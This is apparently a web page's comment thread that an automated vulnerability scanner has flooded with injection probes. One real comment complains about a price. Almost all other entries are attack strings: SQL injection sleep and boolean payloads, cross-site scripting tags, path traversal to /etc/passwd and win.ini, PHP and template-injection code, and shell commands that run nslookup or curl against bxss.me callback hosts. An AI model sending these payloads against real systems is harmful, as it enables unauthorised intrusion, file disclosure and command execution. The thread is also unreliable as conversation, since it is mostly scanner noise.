&(nslookup${IFS}-q${IFS}cname${IFS}hitsmccfmvzkeb7a06.bxss.me||curl${IFS}hitsmccfmvzkeb7a06.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitsmccfmvzkeb7a06.bxss.me||curl${IFS}hitsmccfmvzkeb7a06.bxss.me)&`'
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
'"()
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
'&&sleep(27*1000)*wfeqws&&'
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(108).concat(68).concat(106).concat(71)+(require"socket"
Socket.gethostbyname("hittg"+"govccldtadb4b.bxss.me.")[3].to_s)+"
re: Just_Ingest
"&&sleep(27*1000)*krmtjb&&"
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(105).concat(79).concat(121).concat(84)+(require'socket'
Socket.gethostbyname('hitwr'+'urzbqobs0a7b9.bxss.me.')[3].to_s)+'
re: Just_Ingest
'||sleep(27*1000)*kktcnq||'
re: Just_Ingest
'A'.concat(70-3).concat(22*4).concat(115).concat(68).concat(118).concat(72)+(require'socket'
Socket.gethostbyname('hitcx'+'pjghxloaa99b6.bxss.me.')[3].to_s)
re: Just_Ingest
"||sleep(27*1000)*wonwpt||"
re: Just_Ingest
replies
re: Just_Ingest
replies�
re: Just_Ingest
replies/.
re: Just_Ingest
'"
re: Just_Ingest
<!--
re: Just_Ingest
'"()&%<zzz><ScRiPt >4Gc3(9850)</ScRiPt>
re: Just_Ingest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitbcffunjnpa7a62f.bxss.me")}}
re: Just_Ingest
'"()&%<zzz><ScRiPt >4Gc3(9712)</ScRiPt>
re: Just_Ingest
9352193
re: Just_Ingest
VhP4Br9h
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
-1 OR 5*5=25 --
re: Just_Ingest
-1 OR 5*5=26 --
re: Just_Ingest
-1 OR 5*5=25
re: Just_Ingest
-1 OR 5*5=26
re: Just_Ingest
*if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
-1 waitfor delay '0:0:15' --
re: Just_Ingest
2nQo99GZ'; waitfor delay '0:0:15' --
re: Just_Ingest
-1 OR 933=(SELECT 933 FROM PG_SLEEP(15))--
re: Just_Ingest
-1) OR 819=(SELECT 819 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 522=(SELECT 522 FROM PG_SLEEP(15))--
re: Just_Ingest
yCqXD2dV' OR 224=(SELECT 224 FROM PG_SLEEP(15))--
re: Just_Ingest
f0uQGf5F') OR 580=(SELECT 580 FROM PG_SLEEP(15))--
re: Just_Ingest
mCV1lyoc')) OR 805=(SELECT 805 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
'"
re: Just_Ingest
@@A1SOM
re: Just_Ingest
(select 198766*667891)
re: Just_Ingest
(select 198766*667891 from DUAL)
Justin, thanks! But oh wow the price is just through the roof.
re: guest
4Kwjodbj
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+217-217-1=0+0+0+1
re: guest
-1 OR 3+217-217-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
pet2zEgT'; waitfor delay '0:0:15' --
re: guest
-5 OR 116=(SELECT 116 FROM PG_SLEEP(15))--
re: guest
cfsWIqkg
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+179-179-1=0+0+0+1
re: guest
-1 OR 3+179-179-1=0+0+0+1
re: guest
-5) OR 817=(SELECT 817 FROM PG_SLEEP(15))--
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
-1)) OR 702=(SELECT 702 FROM PG_SLEEP(15))--
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
sYTM47Wt' OR 427=(SELECT 427 FROM PG_SLEEP(15))--
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
dN1STiOA') OR 200=(SELECT 200 FROM PG_SLEEP(15))--
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
3ZBOb4Yg')) OR 260=(SELECT 260 FROM PG_SLEEP(15))--
re: guest
-1; waitfor delay '0:0:15' --
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
-1); waitfor delay '0:0:15' --
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
1 waitfor delay '0:0:15' --
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
cmd5jpO4'; waitfor delay '0:0:15' --
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
-5 OR 902=(SELECT 902 FROM PG_SLEEP(15))--
re: guest
@@wWgbp
re: guest
-5) OR 711=(SELECT 711 FROM PG_SLEEP(15))--
re: guest
-1)) OR 936=(SELECT 936 FROM PG_SLEEP(15))--
re: guest
LyGsLuuX' OR 174=(SELECT 174 FROM PG_SLEEP(15))--
re: guest
z3YQIkES') OR 159=(SELECT 159 FROM PG_SLEEP(15))--
re: guest
t31o8Pwy')) OR 297=(SELECT 297 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@aEinh
re: guest
1fLnIp0VO
re: guest
response.write(9461943*9030238)
re: guest
'+response.write(9461943*9030238)+'
re: guest
"+response.write(9461943*9030238)+"
re: guest
%0abcc:074625.67-14532.67.11875.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-14533.67.11875.19990.2@bxss.me
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
${9999758+10000211}
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
/etc/passwd
re: guest
echo lczzrl$()\ bteuub\nz^xyu||a #' &echo lczzrl$()\ bteuub\nz^xyu||a #|" &echo lczzrl$()\ bteuub\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
&echo vcccuv$()\ ptupwl\nz^xyu||a #' &echo vcccuv$()\ ptupwl\nz^xyu||a #|" &echo vcccuv$()\ ptupwl\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
|echo nafxqn$()\ twgdwm\nz^xyu||a #' |echo nafxqn$()\ twgdwm\nz^xyu||a #|" |echo nafxqn$()\ twgdwm\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitnayhiczsalf0511.bxss.me||perl -e "gethostbyname('hitnayhiczsalf0511.bxss.me')")
re: guest
)
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
$(nslookup hithicitikhrv57148.bxss.me||perl -e "gethostbyname('hithicitikhrv57148.bxss.me')")
re: guest
!(()&&!|*|*|
re: guest
&nslookup hitjyiqhufynp59772.bxss.me&'\"`0&nslookup hitjyiqhufynp59772.bxss.me&`'
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
^(#$!@#$)(()))******
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
&(nslookup hitlpjqznocac18894.bxss.me||perl -e "gethostbyname('hitlpjqznocac18894.bxss.me')")&'\"`0&(nslookup hitlpjqznocac18894.bxss.me||perl -e "gethostbyname('hitlpjqznocac18894.bxss.me')")&`'
re: guest
file:///etc/passwd
re: guest
|(nslookup hitcwsqdzonwt8b220.bxss.me||perl -e "gethostbyname('hitcwsqdzonwt8b220.bxss.me')")
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
`(nslookup hitjieyxkwutqd4bdf.bxss.me||perl -e "gethostbyname('hitjieyxkwutqd4bdf.bxss.me')")`
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
/WEB-INF/web.xml
re: guest
;(nslookup hitsqwyvkrqep2394c.bxss.me||perl -e "gethostbyname('hitsqwyvkrqep2394c.bxss.me')")|(nslookup hitsqwyvkrqep2394c.bxss.me||perl -e "gethostbyname('hitsqwyvkrqep2394c.bxss.me')")&(nslookup hitsqwyvkrqep2394c.bxss.me||perl -e "gethostbyname('hitsqwyvkrqep2394c.bxss.me')")
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
'.gethostbyname(lc('hitqs'.'yzmisdcq09796.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(82).chr(113).chr(79).'
re: guest
Http://bxss.me/t/fit.txt
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
".gethostbyname(lc("hityp"."npfzgjol9ce9b.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(65).chr(111).chr(84)."
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
/etc/shells
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
c:/windows/win.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
bxss.me
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
"+"A".concat(70-3).concat(22*4).concat(117).concat(73).concat(106).concat(84)+(require"socket"
Socket.gethostbyname("hitdo"+"chvztxvy68f55.bxss.me.")[3].to_s)+"
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
'+'A'.concat(70-3).concat(22*4).concat(100).concat(78).concat(97).concat(85)+(require'socket'
Socket.gethostbyname('hithl'+'ohcumjxy05c9c.bxss.me.')[3].to_s)+'
re: guest
bxss.me/t/xss.html?%00
re: guest
WEB-INF/web.xml
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
WEB-INF\web.xml
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
';print(md5(31337));$a='
re: guest
";print(md5(31337));$a="
re: guest
'"
re: guest
${@print(md5(31337))}
re: guest
<!--
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
1
re: guest
1
re: guest
-1 OR 2+656-656-1=0+0+0+1 --
re: guest
-1 OR 3+656-656-1=0+0+0+1 --
re: guest
-1 OR 2+969-969-1=0+0+0+1
re: guest
-1 OR 3+969-969-1=0+0+0+1
re: guest
-1' OR 2+499-499-1=0+0+0+1 --
re: guest
-1' OR 3+499-499-1=0+0+0+1 --
re: guest
-1' OR 2+702-702-1=0+0+0+1 or '5PZjSei8'='
re: guest
-1' OR 3+702-702-1=0+0+0+1 or '5PZjSei8'='
re: guest
-1" OR 2+965-965-1=0+0+0+1 --
re: guest
-1" OR 3+965-965-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
ib2p4jPa'; waitfor delay '0:0:15' --
re: guest
-5 OR 237=(SELECT 237 FROM PG_SLEEP(15))--
re: guest
-5) OR 871=(SELECT 871 FROM PG_SLEEP(15))--
re: guest
-1)) OR 884=(SELECT 884 FROM PG_SLEEP(15))--
re: guest
Gbmn3A0a' OR 531=(SELECT 531 FROM PG_SLEEP(15))--
re: guest
XY0OP13y') OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: guest
fUyI3Vje')) OR 132=(SELECT 132 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@G13F6
re: guest
1QKKK4PZH0
re: guest
response.write(9392582*9823598)
re: guest
'+response.write(9392582*9823598)+'
re: guest
"+response.write(9392582*9823598)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
${9999992+10000430}
re: guest
file:///etc/passwd
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
redirtest.acx
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
echo uqogvt$()\ yuxkon\nz^xyu||a #' &echo uqogvt$()\ yuxkon\nz^xyu||a #|" &echo uqogvt$()\ yuxkon\nz^xyu||a #
re: guest
'.gethostbyname(lc('hitie'.'ufssmltp0adbc.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(71).chr(108).chr(88).'
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
&echo warwgt$()\ lqyahf\nz^xyu||a #' &echo warwgt$()\ lqyahf\nz^xyu||a #|" &echo warwgt$()\ lqyahf\nz^xyu||a #
re: guest
".gethostbyname(lc("hitlb"."kemqwxbt9f254.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(77).chr(119).chr(85)."
re: guest
/etc/shells
re: guest
|echo dsmooz$()\ cvltcd\nz^xyu||a #' |echo dsmooz$()\ cvltcd\nz^xyu||a #|" |echo dsmooz$()\ cvltcd\nz^xyu||a #
re: guest
gethostbyname(lc('hitko'.'vpofamjk4fd5c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(83).chr(107).chr(90)
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
expr 9000208294 - 931896
re: guest
c:/windows/win.ini
re: guest
(nslookup -q=cname hitlnpcnjmmls90c64.bxss.me||curl hitlnpcnjmmls90c64.bxss.me))
re: guest
bxss.me
re: guest
$(nslookup -q=cname hitbggwbdexjy8f633.bxss.me||curl hitbggwbdexjy8f633.bxss.me)
re: guest
Http://bxss.me/t/fit.txt
re: guest
&nslookup -q=cname hitdkrqeutpfo45dcb.bxss.me&'\"`0&nslookup -q=cname hitdkrqeutpfo45dcb.bxss.me&`'
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
&(nslookup -q=cname hitbwrolscfvl4248f.bxss.me||curl hitbwrolscfvl4248f.bxss.me)&'\"`0&(nslookup -q=cname hitbwrolscfvl4248f.bxss.me||curl hitbwrolscfvl4248f.bxss.me)&`'
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
|(nslookup -q=cname hitpqdvdvvavo3be43.bxss.me||curl hitpqdvdvvavo3be43.bxss.me)
re: guest
bxss.me/t/xss.html?%00
re: guest
';print(md5(31337));$a='
re: guest
`(nslookup -q=cname hituvdpvvggxzbb56b.bxss.me||curl hituvdpvvggxzbb56b.bxss.me)`
re: guest
";print(md5(31337));$a="
re: guest
;(nslookup -q=cname hitfmdidlkinw44bf2.bxss.me||curl hitfmdidlkinw44bf2.bxss.me)|(nslookup -q=cname hitfmdidlkinw44bf2.bxss.me||curl hitfmdidlkinw44bf2.bxss.me)&(nslookup -q=cname hitfmdidlkinw44bf2.bxss.me||curl hitfmdidlkinw44bf2.bxss.me)
re: guest
${@print(md5(31337))}
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hituxypphhkvzf56dc.bxss.me||curl${IFS}hituxypphhkvzf56dc.bxss.me)
re: guest
${@print(md5(31337))}\
re: guest
"+"A".concat(70-3).concat(22*4).concat(112).concat(87).concat(122).concat(81)+(require"socket"
Socket.gethostbyname("hithr"+"kcasyxrjedc93.bxss.me.")[3].to_s)+"
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitgnujwmwjpcf5b42.bxss.me||curl${IFS}hitgnujwmwjpcf5b42.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitgnujwmwjpcf5b42.bxss.me||curl${IFS}hitgnujwmwjpcf5b42.bxss.me)&`'
re: guest
'.print(md5(31337)).'
re: guest
'+'A'.concat(70-3).concat(22*4).concat(118).concat(90).concat(111).concat(73)+(require'socket'
Socket.gethostbyname('hiteu'+'fecinpecd8ac7.bxss.me.')[3].to_s)+'
re: guest
'A'.concat(70-3).concat(22*4).concat(115).concat(89).concat(105).concat(80)+(require'socket'
